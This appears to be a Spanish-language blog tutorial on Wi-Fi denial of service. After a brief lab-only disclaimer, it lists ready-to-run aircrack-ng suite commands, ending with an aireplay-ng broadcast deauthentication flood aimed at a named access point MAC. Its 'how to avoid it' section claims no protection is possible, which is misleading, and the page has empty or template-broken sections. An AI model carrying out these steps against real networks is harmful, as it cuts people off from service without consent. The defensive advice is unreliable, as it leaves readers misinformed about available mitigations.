El procedimiento que definiré a continuación es en un laboratorio personal y con una finalidad meramente didáctica. No me hago responsable del uso que se haga de este tipo de conocimiento.

Primero: ¿Qué es un DoS?

Un DoS, por sus siglas en inglés (Denial of Service) es uno de los tipos de ataque más utilizados por su facilidad y eficacia, la diferencia que existe entre un DoS y un DDoS, es el número de atacantes que participan en este tipo de «acto». Este tipo de ataque tiene como finalidad saturar el host y provocar de esta forma, una interrupción del servicio, ya sea un ordenador, un móvil o un router, como veremos a continuación.

Requisitos:

Pasos a seguir:

1) Identificamos la tarjeta de red:
sudo ifconfig

2) Ponemos la tarjeta de red en modo monitor:
sudo airmon-ng start wlan0

3) Observamos los puntos de acceso cercanos:
sudo airodump-ng wlan0mon

4) Cambiamos el monitor al canal del AP que queremos atacar:
sudo iwconfig wlan0mon channel 1
5) Denegación del servicio:

Utilizamos la herramienta aireplay-ng para suplantar la MAC objetivo y generar mensajes de deautenticación por BROADCAST

sudo aireplay-ng --deauth 0 -a 26:F0:94:DF:6B:BA wlan0mon

¿Cómo evitarlo?

Desgraciadamente, es un tipo de ataque client-side y por lo tanto no podemos ofrecer ningún tipo de protección frente a este ataque, la ÚNICA solución sería enrutar tu propio tráfico y excluir el tipo de paquete deauth.

Como enrutar mi propio tráfico

Una opinión en “%1$s”

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *